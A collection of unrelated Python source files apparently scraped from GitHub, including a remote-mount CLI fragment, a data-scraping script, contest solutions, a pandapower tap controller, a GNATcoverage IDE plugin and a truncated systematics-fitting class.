"timeout": "mounting timeout <int> (default = 10) (add)"}
extra = ('URL generation from settings:\n'
'davfs: <https>://<sharename>.<server>, e.g. https://test.myserver.com/dav.php/\n'
's2hfs: <user>@<server>:<sharename> , e.g. test@192.168.1.1:myfolder\n'
'cifs : //<server>/<sharename> , e.g. //192.168.1.1/test\n'
'nfs : server:<sharename> , e.g. 192.168.1.1:/test\n'
'"nfs4" is prefered as type for nfs, "nfs" as type refers to nfs3\n'
'A specific action for s2hfs (sshfs) can be defined:\n'
'addkey : generate and add an ssh key pair for accessing s2hfs\n'
'addcred: add credentials for accessing s2hfs\n'
'delkey : delete an existing key pair\n'
'delcred: delete existing credentials\n'
'At del, keys and credentials will be deleted\n'
'Mount methods:\n'
'disabled: do not mount\n'
'startup : mount from fstab during startup\n'
'auto : auto mount from fstab when accessed (default)\n'
'dynmount: dynamically mount when available\n'
'Options may be entered as single JSON string using full name, e.g.\n'
'xremotemount add test \'{"server": "192.168.1.1", "sharename": "test", \n'
' "mountpoint": "/mnt/test", "type": "cifs", \n'
' "username": "userme", "password": "secret"}\'\n'
'Mind the single quotes to bind the JSON string.')
self.fillSettings(self.parseOpts(argv, xopts, xargs, extra), xopts)
def fillSettings(self, optsnargs, xopts):
if len(optsnargs[1]) > 0:
self.settings["command"]=optsnargs[1][0]
xopts[self.settings["command"]] = "NA" # Add command for optional JSON input
if len(optsnargs[1]) > 1:
if self.settings["command"] in NAMELIST:
self.settings["name"]=optsnargs[1][1]
else:
if self.isJSON(optsnargs[1][1]):
self.settings.update(self.parseJSON(optsnargs[1][1], xopts))
else:
self.settings["name"]=optsnargs[1][1]
if len(optsnargs[1]) > 2:
self.settings.update(self.parseJSON(optsnargs[1][2], xopts))
if len(optsnargs[1]) > 3:
self.parseError("Too many arguments")
self.settings.update(optsnargs[0])
self.settingsBool(self.settings, 'json')
self.settingsBool(self.settings, 'interactive')
self.settingsBool(self.settings, 'human')
#self.settingsBool(self.settings, 'auto', False)
self.settingsBool(self.settings, 'rw', False)
self.settingsBool(self.settings, 'https', False)
self.settingsInt(self.settings, 'freq', False)
self.settingsInt(self.settings, 'pass', False)
self.settingsStr(self.settings, 'uacc', False)
self.settingsStr(self.settings, 'sacc', False)
self.settingsStr(self.settings, 'username', False)
self.settingsStr(self.settings, 'password', False)
self.nameRequired()
if self.settings['json']:
self.StdoutLogging(False)
else:
self.StdoutLogging(True)
#########################################################
######################### MAIN ##########################
if __name__ == "__main__":
xremotemount().run(sys.argv)
| Helly1206/xnas | opt/xnas/xremotemount.py | xremotemount.py | py | 11,557 | python | en | code | 0 | github-code | 90 |
15853073667 | import pandas as pd
import sqlalchemy
from sqlalchemy import create_engine
# **********************************************************************
def getDataFrame(url_address,ind):
df = pd.read_html(url_address, index_col=None)[ind]
return df
df = getDataFrame("https://www.tiobe.com/tiobe-index/",0)
# **********************************************************************
def quickClean(data):
cols = [col for col in data.columns]
data.rename(columns={f"{cols[4]}" : "Language"}, inplace=True)
data.drop(columns=[cols[2],cols[3]], inplace=True)
return data
df = quickClean(df)
df.head()
# **********************************************************************
def getDataBase(db_name_in,db_name_out,dataframe):
engine = create_engine(f"sqlite:///{db_name_in}.db")
dataframe.to_sql(db_name_out, engine, index=False, if_exists="replace")
return engine
engine = getDataBase("languages","tiobe",df)
# **********************************************************************
df2 = getDataFrame("https://en.wikipedia.org/wiki/Comparison_of_programming_languages",1)
df2.head()
# **********************************************************************
engine = getDataBase("languages","wiki",df2)
# **********************************************************************
pd.read_sql(
"""
SELECT
t.Language,
w.Imperative
FROM
tiobe AS t
LEFT JOIN wiki AS w ON t.Language = w.Language
LIMIT 5
""",
engine
)
| julien-blanchard/personal_website | 06_sqlalchemy/sqlalchemy.py | sqlalchemy.py | py | 1,553 | python | en | code | 0 | github-code | 90 |
18184797949 | MOD = 10 ** 9 + 7
n, k = map(int, input().split())
alst = list(map(int, input().split()))
alst.sort()
if n == k:
ans = 1
for num in alst:
ans *= num
ans %= MOD
print(ans)
exit()
if k == 1:
print(alst[-1] % MOD)
exit()
if alst[0] >= 0:
ans = 1
alst.sort(reverse = True)
for i in range(k):
ans *= alst[i]
ans %= MOD
print(ans)
exit()
if alst[-1] <= 0:
ans = 1
if k % 2 == 1:
alst = alst[::-1]
for i in range(k):
ans *= alst[i]
ans %= MOD
print(ans)
exit()
blst = []
for num in alst:
try:
blst.append([abs(num), abs(num) // num])
except ZeroDivisionError:
blst.append([abs(num), 0])
blst.sort(reverse = True,key = lambda x:x[0])
if blst[k - 1] == 0:
print(0)
exit()
minus = 0
last_minus = 0
last_plus = 0
ans_lst = []
for i in range(k):
if blst[i][1] == -1:
minus += 1
last_minus = blst[i][0]
elif blst[i][1] == 1:
last_plus = blst[i][0]
else:
print(0)
exit()
ans_lst.append(blst[i][0])
next_minus = 0
next_plus = 0
flg_minus = False
flg_plus = False
for i in range(k, n):
if blst[i][1] == -1 and (not flg_minus):
next_minus = blst[i][0]
flg_minus = True
if blst[i][1] == 1 and (not flg_plus):
next_plus = blst[i][0]
flg_plus = True
if (flg_plus and flg_minus) or blst[i][1] == 0:
break
if minus % 2 == 0:
ans = 1
for num in ans_lst:
ans *= num
ans %= MOD
print(ans)
else:
minus_s = last_minus * next_minus
plus_s = last_plus * next_plus
ans = 1
if minus == k:
ans_lst.remove(last_minus)
ans_lst.append(next_plus)
elif minus_s == plus_s == 0:
if next_minus == 0:
ans_lst.remove(last_minus)
ans_lst.append(next_plus)
else:
print(0)
exit()
elif minus_s > plus_s:
ans_lst.remove(last_plus)
ans_lst.append(next_minus)
else:
ans_lst.remove(last_minus)
ans_lst.append(next_plus)
for num in ans_lst:
ans *= num
ans %= MOD
print(ans)
| Aasthaengg/IBMdataset | Python_codes/p02616/s333711401.py | s333711401.py | py | 2,200 | python | en | code | 0 | github-code | 90 |
28104600577 | iPrue = 0
while iPrue == 0:
iCont = 0
print("-" * 70)
sFras = input("Ingrese una frase (si quiere salir ingrese la letra ""q""): ")
sFrasMay = sFras.upper()
for i in sFrasMay:
if i.upper() in "AEIOU":
iCont+= 1
if sFrasMay == "Q":
print("-" * 70)
print("Fin del programa")
break
else:
print(f"La frase /{sFras}/ tiene {iCont} vocales") | AlejandroP75/CampusAP75 | Python/Software Review/05-Ejercicio3_Estructuras_Condicionales_Validacion.py | 05-Ejercicio3_Estructuras_Condicionales_Validacion.py | py | 426 | python | es | code | 0 | github-code | 90 |
37788487674 | """ This plugin adds support for GNATcoverage.
This plugin provides the following:
* A new Build Mode "gnatcov"
* Several new project attributes which GPS will
use to drive various tools in the context of
GNATcoverage
* Build targets to launch runs and analyses
* Menus corresponding to these build targets.
The Build Mode "gnatcov" is listed in the Build Mode
combo, in the main toolbar. Objects generated under
this build mode are generated in a subdirectory "gnatcov"
in all object and executable directories specified by
the project hierarchy.
The following Project Properties are added, which are
available in the "GNATcov" section of the Project
Properties editor, and which map to attributes in a
package "IDE_Coverage" in the project files.
* Gnatcov_Mode_Switches: switches that GPS will pass
to the command line used to build while the "gnatcov"
Build Mode is selected
* Level_Run: the coverage level to pass to the
"gnatcov run" command
* Switches_Run: additional switches to pass to
the "gnatcov run" command
* Level_Coverage: the coverage level to pass to
the "gnatcov coverage" command
* Switches_Coverage: additional switches to pass
to the "gnatcov coverage" command
This plugin defines two new build targets, to launch
"gnatcov run" and "gnatcov coverage", automatically
generated for every executable defined in the project
hierarchy, along with menus, under the menu
Tools->GNATcoverage.
In addition, this plugin automatically loads or refreshes
the Coverage Report in GPS after every call to the
"gnatcov coverage" build target.
With this plugin, the steps to follow for a typical
GNATcoverage session would be:
1 - switch to the "gnatcov" Build Mode in the toolbar
2 - build the executable using the standard mechanism
3 - launch a first run using the menu
Tools->GNATcoverage->Run under gnatcov
4 - launch a first analysis using the menu
Tools->GNATcoverage->Coverage with gnatcov
5 - edit the code or the test driver, then rerun
steps 2, 3, 4
All these steps can be executed at once via the 'Run GNATcov'
button, which is added to the main toolbar when the plugin
is enabled.
Note: this plugin activates only when the command-line tool
"gnatcov" is found on the PATH.
"""
###########################################################################
# No user customization below this line
###########################################################################
import os.path
import GPS
from extensions.private.xml import X
import os_utils
import workflows.promises as promises
import workflows
def list_to_xml(items):
return '\n'.join(str(i) for i in items)
gnatcov_path = os_utils.locate_exec_on_path('gnatcov')
gnatcov_install_dir = (
os.path.join(os.path.dirname(gnatcov_path), '..')
if gnatcov_path else
None
)
class GNATcovPlugin(object):
PLUGIN_MENU = '/Analyze/Coverage/GNATcov/'
# Keep this style name synchronized with Code_Coverage.GNATcov.
PROJECT_ATTRIBUTES = [
X(
'project_attribute',
package='IDE_Coverage',
name='Gnatcov_Mode_Switches',
label="Switches in 'gnatcov' mode",
description=("Extra build switches to pass to the builder when in"
" 'gnatcov' mode."),
editor_page='GNATcov',
editor_section='Build',
hide_in='wizard library_wizard',
).children(X('string')),
X(
'project_attribute',
name='Level_Run',
label='Coverage Level',
package='IDE_Coverage',
editor_page='GNATcov',
editor_section='Run',
hide_in='wizard library_wizard',
description='The coverage level to pass to gnatcov run.',
).children(
X('choice').children('branch'),
X('choice').children('insn'),
X('choice', default='true').children('stmt'),
X('choice').children('stmt+decision'),
X('choice').children('stmt+mcdc'),
),
X(
'project_attribute',
name='Switches_Run',
label='Extra switches',
package='IDE_Coverage',
editor_page='GNATcov',
editor_section='Run',
hide_in='wizard library_wizard',
description='Extra build switches to pass to gnatcov run.',
).children(X('string')),
X(
'project_attribute',
name='Level_Coverage',
label='Coverage Level',
package='IDE_Coverage',
editor_page='GNATcov',
editor_section='Coverage',
hide_in='wizard library_wizard',
description='The coverage level to pass to gnatcov coverage.',
).children(
X('choice').children('branch'),
X('choice').children('insn'),
X('choice', default='true').children('stmt'),
X('choice').children('stmt+decision'),
X('choice').children('stmt+mcdc'),
),
X(
'project_attribute',
name='Switches_Coverage',
label='Extra switches',
package='IDE_Coverage',
editor_page='GNATcov',
editor_section='Coverage',
hide_in='wizard library_wizard',
description='Extra build switches to pass to gnatcov coverage.',
).children(X('string')),
]
BUILD_MODES = [
X('builder-mode', name='gnatcov').children(
X('description').children('Build with GNATcoverage information'),
X('subdir').children('gnatcov'),
X('supported-model').children('builder'),
X('supported-model').children('gnatmake'),
X('supported-model').children('gprbuild'),
X('supported-model', filter='--subdirs=').children('gnatcov-run'),
X('supported-model', filter='--subdirs=').children(
'gnatcov-coverage'),
X('supported-model', filter='--subdirs=').children('gprclean'),
X('supported-model', filter='--subdirs=').children(
'GNATtest execution mode'),
X('extra-args', sections='-cargs').children(
X('arg').children("%attr(ide_coverage'gnatcov_mode_switches)"),
X('arg').children('--subdirs=%subdir'),
X('arg', section='-cargs').children('-g'),
X('arg', section='-cargs').children('-fdump-scos'),
X('arg', section='-cargs').children('-fpreserve-control-flow'),
)
)
]
BUILD_TARGETS = [
X('target-model', name='gnatcov-build-main', category='').children(
X('description').children('Build Main with the gnatcov switches'),
X('command-line').children(
X('arg').children('gprbuild')
),
X('iconname').children('gps-build-all-symbolic'),
X('switches', command='%(tool_name)s', columns='2', lines='2'),
),
X('target', model='gnatcov-build-main', category='GNATcov',
name='GNATcov Build Main', menu=PLUGIN_MENU).children(
X('target-type').children('executable'),
X('in-toolbar').children('FALSE'),
X('in-menu').children('TRUE'),
X('read-only').children('TRUE'),
X('output-parsers').children(
'output_chopper utf_converter console_writer end_of_build'),
X('iconname').children('gps-build-all-symbolic'),
X('launch-mode').children('MANUALLY'),
X('command-line').children(
X('arg').children('%builder'),
X('arg').children('-P%PP'),
X('arg').children('%subdirsarg'),
X('arg').children('-s'),
X('arg').children('-cargs'),
X('arg').children('-g'),
X('arg').children('-fdump-scos'),
X('arg').children('-fpreserve-control-flow')
)
),
# Program execution under instrumented execution environment
X('target-model', name='gnatcov-run', category='').children(
X('description').children('Run under GNATcov for code coverage'),
X('command-line').children(
X('arg').children('gnatcov'),
X('arg').children('run'),
),
X('iconname').children('gps-build-all-symbolic'),
X('switches', command='%(tool_name)s', columns='1', lines='1')
),
X('target', model='gnatcov-run', category='GNATcov',
name='Run under GNATcov', menu=PLUGIN_MENU).children(
X('target-type').children('executable'),
X('in-toolbar').children('FALSE'),
X('in-menu').children('TRUE'),
X('read-only').children('TRUE'),
X('output-parsers').children(
'output_chopper utf_converter console_writer end_of_build'),
X('iconname').children('gps-build-all-symbolic'),
X('launch-mode').children('MANUALLY'),
X('command-line').children(
X('arg').children('gnatcov'),
X('arg').children('run'),
X('arg').children('-P%PP'),
X('arg').children('--recursive'),
X('arg').children('%target'),
X('arg').children('-c'),
X('arg').children("%attr(ide_coverage'level_run,stmt)"),
X('arg').children('-o'),
X('arg').children('%TT.trace'),
X('arg').children('%E'),
X('arg').children("%attr(ide_coverage'switches_run)"),
),
),
# Coverage report generation
X('target-model', name='gnatcov-coverage', category='').children(
X('description').children('Code coverage with GNATcov'),
X('command-line').children(
X('arg').children('gnatcov'),
X('arg').children('coverage'),
X('arg').children('-P%PP'),
X('arg').children('--recursive'),
X('arg').children('%target'),
X('arg').children('--annotate=xcov'),
),
X('iconname').children('gps-build-all-symbolic'),
X('switches', command='%(tool_name)s', columns='1', lines='4'),
),
X('target', model='gnatcov-coverage', category='GNATcov',
name='Generate GNATcov Main Report',
menu=PLUGIN_MENU).children(
X('target-type').children('executable'),
X('in-toolbar').children('FALSE'),
X('in-menu').children('TRUE'),
X('read-only').children('TRUE'),
X('output-parsers').children(
'output_chopper utf_converter console_writer end_of_build'),
X('iconname').children('gps-build-all-symbolic'),
X('launch-mode').children('MANUALLY'),
X('command-line').children(
X('arg').children('gnatcov'),
X('arg').children('coverage'),
X('arg').children('-P%PP'),
X('arg').children('--recursive'),
X('arg').children('%target'),
X('arg').children('-c'),
X('arg').children("%attr(ide_coverage'level_coverage,stmt)"),
X('arg').children('--annotate=xcov+'),
X('arg').children('--output-dir=%O'),
X('arg').children('-T'),
X('arg').children('%TT.trace'),
X('arg').children("%attr(ide_coverage'switches_coverage)"),
),
),
]
GNATCOV_DOCUMENTATION = [
X('doc_path').children(
os.path.join(gnatcov_install_dir, 'share',
'doc', 'gnatcoverage', 'html')
if gnatcov_install_dir else
None
),
X('documentation_file').children(
X('name').children('gnatcov.html'),
X('descr').children("GNATcoverage User's Guide"),
X('category').children('GNATcoverage'),
X('menu', before='About').children(
"/Help/GNATcoverage/GNATcoverage User's Guide"
),
),
]
GNATEMU_DOCUMENTATION = [
X('doc_path').children('share/doc/gnatemu/html'),
X('documentation_file').children(
X('name').children('gnatemulator.html'),
X('descr').children('GNATemulator Documentation'),
X('category').children('GNATcoverage'),
X('menu', before='About').children(
'/Help/GNATcoverage/GNATemulator Documentation'
),
),
]
def __init__(self):
# Create all custom things that do not require GPS' GUI to be ready
# (i.e.: all but menus and hooks).
for xml_nodes in (
self.PROJECT_ATTRIBUTES, self.BUILD_MODES,
self.GNATCOV_DOCUMENTATION, self.GNATEMU_DOCUMENTATION,
):
GPS.parse_xml(list_to_xml(xml_nodes))
# Create the GNATcoverage toolbar button
self.create_toolbar_button()
# Defer further initialization to when GPS is completely ready.
GPS.Hook('gps_started').add(self.on_gps_started)
def create_toolbar_button(self):
workflows.create_target_from_workflow(
target_name="Run GNATcoverage",
workflow_name="run-gnatcov",
workflow=self.run_gnatcov_wf,
icon_name="gps-run-gnatcov-symbolic",
parent_menu="/Build/Workflow/GNATcov/")
def run_gnatcov_wf(self, main_name):
# Build the project with GNATcov switches
p = promises.TargetWrapper("GNATcov Build Main")
r = yield p.wait_on_execute()
if r is not 0:
GPS.Console("Messages").write("Can't build the project with " +
"the GNATcov switches", mode="error")
return
# Get the executable to analyze
exe = str(GPS.File(main_name).executable_path)
# Run GNATcov on it
p = promises.TargetWrapper("Run under GNATcov")
r = yield p.wait_on_execute(exe)
if r is not 0:
GPS.Console("Messages").write("GNATcov run failed ", mode="error")
return
# Generate and display the GNATcov Coverage Report
p = promises.TargetWrapper("Generate GNATcov Main Report")
r = yield p.wait_on_execute(exe)
def on_gps_started(self, hook):
# Now the parent menu is present, fill it with custom targets.
GPS.parse_xml(list_to_xml(self.BUILD_TARGETS))
GPS.Hook('compilation_finished').add(self.on_compilation_finished)
def reload_gnatcov_data(self):
"""Clean the coverage report and reload it from the files."""
# If needed, switch to GNATcov build mode.
if GPS.Preference("Coverage-Toolchain").get() != 'Gnatcov':
GPS.Preference("Coverage-Toolchain").set('Gnatcov')
GPS.execute_action("coverage clear from memory")
if GPS.Project.root().is_harness_project():
a = GPS.CodeAnalysis.get("Coverage Report")
original = GPS.Project.root().original_project().file()
a.add_gcov_project_info(original)
else:
GPS.execute_action("coverage load data for all projects")
def on_compilation_finished(self, hook, category,
target_name="", mode_name="", status=""):
"""Called whenever a compilation ends."""
# If compilation failed, do nothing.
if status:
return
if target_name in ["Generate GNATcov Main Report"]:
self.reload_gnatcov_data()
# This plugin makes sense only if GNATcoverage is available.
if os_utils.locate_exec_on_path('gnatcov'):
plugin = GNATcovPlugin()
| AaronC98/PlaneSystem | Code/share/gps/support/ui/gnatcov.py | gnatcov.py | py | 15,865 | python | en | code | 0 | github-code | 90 |
10511831109 | import Utils
import numpy as np
import matplotlib.pyplot as plt
import math
# Centers an image based on position of dots
# Not used in standard workflow because translation blurs the image
def CenterImage(image, showTranslate=False):
# Find center point
height, width = Utils.GetImageSize(image, path=False)
center = (width/2, height/2)
# Find all points in image
rows, cols = np.where(image != 0)
# Find centroid and calculate appropriate transformation
xAvg = np.average(cols)
yAvg = np.average(rows)
xTrans = xAvg - center[0]
yTrans = yAvg - center[1]
# Translate image to center
image = Utils.TranslateImage(image, xTrans, yTrans)
# Display new image with calculated point center (red) and center of image (blue)
if showTranslate:
plt.imshow(image, cmap="gray")
plt.scatter(xAvg, yAvg,s=50, c="r")
plt.scatter(center[0], center[1], s=50, c="b")
plt.show()
# Re-find all the points in the image
rows, cols = np.where(image != 0)
points = list(zip(cols,rows))
# Find point closest to center
distances = []
pointDistance = lambda p1,p2: math.sqrt( (p1[0] - p2[0])**2 + (p1[1] - p2[1])**2 )
for point in points:
distances.append(pointDistance(point, center))
minDist = min(distances)
minDistIndex = distances.index(minDist)
centralPoint = points[minDistIndex]
# Find x and y distance from central point to center of image
xTrans = centralPoint[0] - center[0]
yTrans = centralPoint[1] - center[1]
image = Utils.TranslateImage(image, xTrans, yTrans)
# Display new image with central point (red) and center of image (blue)
if showTranslate:
plt.imshow(image, cmap="gray")
plt.scatter(centralPoint[0], centralPoint[1], s=50, c="r")
plt.scatter(center[0], center[1], s=50, c="b")
plt.show()
return image
| MANATEE-UF/CrystallographyClassification | RecyclingBin/CenterImage.py | CenterImage.py | py | 1,912 | python | en | code | 0 | github-code | 90 |
5101216298 | class Solution:
def oddCells(self, n: int, m: int, indices: list[list[int]]) -> int:
n_point=[0 for _ in range(n)]
m_point=[0 for _ in range(m)]
for i in range(len(indices)):
ind_i=indices[i]
n_point[ind_i[0]]+=1
m_point[ind_i[1]]+=1
ans=0
for i in range(n):
for j in range(m):
if( (n_point[i]+m_point[j])%2 != 0 ):
ans+=1
return ans | WAT36/procon_work | procon_python/src/leetcode/1252_Cells_with_Odd_Values_in_a_Matrix.py | 1252_Cells_with_Odd_Values_in_a_Matrix.py | py | 470 | python | en | code | 1 | github-code | 90 |
37277126593 | import logging
import re
from oda.libs.odb.disassembler.ofd import Ofd
from .instruction import *
logger = logging.getLogger(__name__)
class Processor(object):
'''
classdocs
'''
def __init__(self, odb_file):
self.vma = ""
self.vmaStr = []
self.branchLineHtml = ""
self.largestInstSize = 0
self.opcodeTypes = {}
self.instSampleInterval = 50
# {funcAddrA: [crossRef0, crossRef1], funcAddrB: [crossRef0, crossRef1]}
self.options = []
# raw binary bytes "xx xx xx .."
self.rawBytesRegExStr = "((?:[0-9a-f]{2} )+)"
self.errorInstRegExStr = "\(bad\)"
self.errorInstRegEx = re.compile(self.errorInstRegExStr)
# don't include "<symbol_name>" as part of operands
self.opcodeRegExStr = "^(\w+)\s+([^<]+)"
self.opcodeRegEx = re.compile(self.opcodeRegExStr)
self.odb_file = odb_file
self.instParserRegEx = re.compile(
# beginning of the line plus white space
"^\s*" +
# vma, followed by white space
"([0-9a-f]*)\s+" +
# raw binary bytes
self.rawBytesRegExStr +
# instruction
"\s+(.*)$"
)
# in this case, the analyzer is severely crippled and only useful for getting platform options
if odb_file:
self.ofd = Ofd(odb_file.get_binary())
# override this in the subclass if you need to (i.e., mips)
def processOptions(self, options):
return options
def getInstructionType(self,opcode):
if opcode in self.opcodeTypes:
return self.opcodeTypes[opcode]
return InstructionType.normal
# override in the sub-class
def computeTargetAddr(self,inst):
pass
# override in the sub-class
def getMaxInstructionLenBytes(self):
pass
def get_processor(arch, odb_file):
# for now, ignore everything after the colon
arch = arch.split(':')[0]
name = 'oda.libs.odb.disassembler.processors.' + arch
try:
mod = __import__(name)
except ImportError as e:
return Processor(odb_file)
components = name.split('.')
for comp in components[1:]:
mod = getattr(mod, comp)
initFunc = getattr(mod, arch)
obj = initFunc(odb_file)
return obj | vancaho/oda | django/oda/libs/odb/disassembler/processors/processor.py | processor.py | py | 2,420 | python | en | code | null | github-code | 90 |
42853919075 | m,n=map(int,input().split())
k=0
for x in range(1,m+1):
if(m==(n**x)):
k=k+1
break
if(k==1):
print("yes")
else:
print("no")
| Shamabanu/python | power or not.py | power or not.py | py | 152 | python | en | code | 2 | github-code | 90 |
71915508776 | from __future__ import division
__author__ = 'lthurner'
import numpy as np
from pandapower.control.controller.trafo_control import TrafoController
class ContinuousTapControl(TrafoController):
"""
Trafo Controller with local tap changer voltage control.
INPUT:
**net** (attrdict) - Pandapower struct
**tid** (int) - ID of the trafo that is controlled
**vm_set_pu** (float) - Maximum OLTC target voltage at bus in pu
OPTIONAL:
**tol** (float, 0.001) - Voltage tolerance band at bus in percent (default: 1% = 0.01pu)
**side** (string, "lv") - Side of the transformer where the voltage is controlled
**trafo_type** (float, "2W") - Trafo type ("2W" or "3W")
**in_service** (bool, True) - Indicates if the controller is currently in_service
**check_tap_bounds** (bool, True) - In case of true the tap_bounds will be considered
**drop_same_existing_ctrl** (bool, False) - Indicates if already existing controllers of the same type and with the same matching parameters (e.g. at same element) should be dropped
"""
def __init__(self, net, tid, vm_set_pu, tol=1e-3, side="lv", trafotype="2W", in_service=True,
check_tap_bounds=True, level=0, order=0, drop_same_existing_ctrl=False, **kwargs):
super().__init__(net, tid=tid, side=side, tol=tol, in_service=in_service,
trafotype=trafotype,
level=level, order=order, drop_same_existing_ctrl=drop_same_existing_ctrl,
matching_params={"tid": tid, 'trafotype': trafotype}, **kwargs)
self.matching_params = {"tid": tid, 'trafotype': trafotype}
t = self.net[self.trafotable]
b = self.net.bus
if trafotype == "2W":
self.t_nom = t.at[tid, "vn_lv_kv"] / t.at[tid, "vn_hv_kv"] * \
b.at[self.net[self.trafotable].at[tid, "hv_bus"], "vn_kv"] / \
b.at[self.net[self.trafotable].at[tid, "lv_bus"], "vn_kv"]
elif side == "lv":
self.t_nom = t.at[tid, "vn_lv_kv"] / t.at[tid, "vn_hv_kv"] * \
b.at[self.net[self.trafotable].at[tid, "hv_bus"], "vn_kv"] / \
b.at[self.net[self.trafotable].at[tid, "lv_bus"], "vn_kv"]
elif side == "mv":
self.t_nom = t.at[tid, "vn_mv_kv"] / t.at[tid, "vn_hv_kv"] * \
b.at[self.net[self.trafotable].at[tid, "hv_bus"], "vn_kv"] / \
b.at[self.net[self.trafotable].at[tid, "mv_bus"], "vn_kv"]
self.check_tap_bounds = check_tap_bounds
self.vm_set_pu = vm_set_pu
self.trafotype = trafotype
if trafotype == "2W":
self.net.trafo["tap_pos"] = self.net.trafo.tap_pos.astype(float)
elif trafotype == "3W":
self.net.trafo3w["tap_pos"] = self.net.trafo3w.tap_pos.astype(float)
self.tol = tol
def control_step(self):
"""
Implements one step of the ContinuousTapControl
"""
delta_vm_pu = self.net.res_bus.at[self.controlled_bus, "vm_pu"] - self.vm_set_pu
tc = delta_vm_pu / self.tap_step_percent * 100 / self.t_nom
self.tap_pos += tc * self.tap_side_coeff * self.tap_sign
if self.check_tap_bounds:
self.tap_pos = np.clip(self.tap_pos, self.tap_min, self.tap_max)
# WRITE TO NET
self.net[self.trafotable].at[self.tid, "tap_pos"] = self.tap_pos
def is_converged(self):
"""
The ContinuousTapControl is converged, when the difference of the voltage between control steps is smaller
than the Tolerance (tol).
"""
if not self.net[self.trafotable].at[self.tid, 'in_service']:
return True
vm_pu = self.net.res_bus.at[self.controlled_bus, "vm_pu"]
self.tap_pos = self.net[self.trafotable].at[self.tid, 'tap_pos']
difference = 1 - self.vm_set_pu / vm_pu
if self.check_tap_bounds:
if self.tap_side_coeff * self.tap_sign == 1:
if vm_pu < self.vm_set_pu and self.tap_pos == self.tap_min:
return True
elif vm_pu > self.vm_set_pu and self.tap_pos == self.tap_max:
return True
elif self.tap_side_coeff * self.tap_sign == -1:
if vm_pu > self.vm_set_pu and self.tap_pos == self.tap_min:
return True
elif vm_pu < self.vm_set_pu and self.tap_pos == self.tap_max:
return True
return abs(difference) < self.tol
| thediavel/RL-ThesisProject-ABB | env/Lib/site-packages/pandapower/control/controller/trafo/ContinuousTapControl.py | ContinuousTapControl.py | py | 4,602 | python | en | code | 3 | github-code | 90 |
18655962128 | from node import Node
#Set this to True to get a full tree print out
VERBOSE= True
#Open the input file and read each word into a list
f = open('input.txt', 'r')
wordlist = f.read().splitlines()
f.close()
wordlist = [s.upper() for s in wordlist]
#Sort this list into alphabetical order
#This may be a waste of time...
wordlist.sort()
#Remove all commented lines
i = 0
while(i < len(wordlist)-1):
if(wordlist[i][0] != '#'):
break
i += 1
#Ensure the list has some words in it
if(i > len(wordlist)-1):
print('No elements found in list.')
exit(0)
del wordlist[:i]
#This empty node will act as the head of the tree
head = Node()
#Add each word to the tree by creating new nodes if they do not exist
for word in wordlist:
parent = head
for letter in word:
if(parent.getChildByData(letter) == None):
parent.addChild(letter)
parent = parent.getChildByData(letter)
parent.validEnd = True
#Colapse the tree to get rid of extra nodes that have no possibility
# of being reached by themself.
head.collapse()
if(VERBOSE):
head.printTree()
#This generates the regEx one letter at a time.
#Should be updated to generate from the head
fullRegEx = head.generateRegEx()
print(fullRegEx) | jkoppenhaver/regexGenerator | main.py | main.py | py | 1,209 | python | en | code | 11 | github-code | 90 |
3213772266 | #!/usr/bin/env python
# coding: utf-8
def find_indices(input_list, n):
ht = {}
counter = 0
for v in input_list:
ad = n - v
if ad in ht.values():
for k in ht.keys():
if ht[k] == ad:
return k, counter
else:
ht[counter] = v
counter += 1
return None
| Bagich/AppliedPython | homeworks/homework_01/hw1_arrsearch.py | hw1_arrsearch.py | py | 356 | python | en | code | 0 | github-code | 90 |
16931626321 | """
This class provides a general Systematics class
"""
import copy
import logging
import numpy as np
import pandas as pd
from abc import ABC, abstractmethod
from collections.abc import Sequence
from typing import Union, Optional, Tuple, List
from templatefitter.binned_distributions.binning import Binning
from templatefitter.binned_distributions.weights import Weights, WeightsInputType
logging.getLogger(__name__).addHandler(logging.NullHandler())
__all__ = [
"SystematicsInfo",
"SystematicsInputType"
]
SystematicsUncertInputType = Union[WeightsInputType, List[WeightsInputType]]
SystematicsFromVarInputType = Tuple[WeightsInputType, SystematicsUncertInputType]
MatrixSystematicsInputType = np.ndarray
SingleSystematicsInputType = Union[None, MatrixSystematicsInputType, SystematicsFromVarInputType]
MultipleSystematicsInputType = List[SingleSystematicsInputType]
SystematicsInputType = Union[None, SingleSystematicsInputType, MultipleSystematicsInputType]
class SystematicsInfoItem(ABC):
def __init__(self):
self._sys_type = None
self._sys_weight = None
self._sys_uncert = None
self._cov_matrix = None
@abstractmethod
def get_covariance_matrix(
self,
data: Optional[np.ndarray] = None,
weights: WeightsInputType = None,
binning: Optional[Binning] = None
) -> np.ndarray:
raise NotImplementedError()
@abstractmethod
def get_varied_hist(
self,
initial_varied_hists: Optional[Tuple[np.ndarray, ...]],
data: Optional[np.ndarray] = None,
weights: WeightsInputType = None,
binning: Optional[Binning] = None
) -> Tuple[np.ndarray, ...]:
raise NotImplementedError()
@staticmethod
@abstractmethod
def get_cov_from_varied_hists(varied_hists) -> np.ndarray:
raise NotImplementedError()
class SystematicsInfoItemFromCov(SystematicsInfoItem):
def __init__(self, cov_matrix: np.ndarray):
super().__init__()
assert isinstance(cov_matrix, np.ndarray), type(cov_matrix)
assert len(cov_matrix.shape) == 2, cov_matrix.shape
assert cov_matrix.shape[0] == cov_matrix.shape[1], cov_matrix.shape
self._sys_type = "cov_matrix"
self._cov_matrix = cov_matrix
def get_covariance_matrix(
self,
data: Optional[np.ndarray] = None,
weights: WeightsInputType = None,
binning: Optional[Binning] = None
) -> np.ndarray:
assert binning is not None
assert self._cov_matrix.shape[0] == self._cov_matrix.shape[1], self._cov_matrix.shape
assert binning.num_bins_total == self._cov_matrix.shape[0], (binning.num_bins_total, self._cov_matrix.shape)
return self._cov_matrix
def get_varied_hist(self, initial_varied_hists, data=None, weights=None, binning=None) -> None:
raise NotImplementedError("This method is not (yet) supported for systematics provided via covariance matrix.")
@staticmethod
def get_cov_from_varied_hists(varied_hists: Tuple[np.ndarray, ...]) -> None:
raise NotImplementedError("This method is not (yet) supported for systematics provided via covariance matrix.")
class SystematicsInfoItemFromUpDown(SystematicsInfoItem):
def __init__(self, sys_weight: np.ndarray, sys_uncert: np.ndarray):
super().__init__()
self._sys_type = "up_down"
assert isinstance(sys_uncert, np.ndarray), type(sys_uncert)
assert len(sys_uncert.shape) == 1, sys_uncert.shape
assert len(sys_weight) == len(sys_uncert), (sys_weight.shape, sys_uncert.shape)
self._sys_weight = sys_weight
self._sys_uncert = sys_uncert
def get_covariance_matrix(
self,
data: Optional[np.ndarray] = None,
weights: WeightsInputType = None,
binning: Optional[Binning] = None
) -> np.ndarray:
